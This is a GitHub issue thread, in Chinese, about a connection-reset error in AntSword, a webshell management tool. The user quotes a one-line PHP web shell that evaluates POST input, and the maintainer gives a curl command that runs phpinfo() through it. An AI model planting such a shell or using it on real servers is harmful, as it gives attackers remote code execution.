### ISSUE TITLE
{"code":"ECONNRESET"}

### ISSUE THREAD

**Issue by y35uishere** [AntSwordProject/antSword#106]
我使用的操作系统是 ***Windows*** 10+
我使用的是 64 位操作系统

![image](https://user-images.githubusercontent.com/8746668/50134433-d6172080-02ca-11e9-9a56-0a2306e11e9a.png)

两台windows都是这样
测试无论连接远程shell还是本地127的shell
都是这样

**Comment by Medicean** [comment]
错误说的很明显了，Conn Reset 连接被重置。贴一下 shell 和你的配置

**Comment by y35uishere** [comment]
http://127.0.0.1/2222.php
shell 代码
<?php eval($_POST['ant']); ?>
类型php
编码默认和base64，chr都试过，跟这个没啥关系

**Comment by Medicean** [comment]
首先，检查一下代理设置，如果没问题，尝试直接访问 shell。

如果你有 curl 直接用 curl 去访问一下 shell：

```
$ curl -X POST 'http://127.0.0.1/2222.php' --data "ant=phpinfo();"
```
没有的话，用 burp 或者任何发包工具去访问一下。

**Comment by Medicean** [comment]
先不版聊了，来这里反馈 https://discord.gg/Uzh5nUf

**Comment by y35uishere** [comment]
用抓包工具看了下
antsword访问shell 错误代码502
但是直接访问shell  200
如果用antsword抓包的重新发送也是200
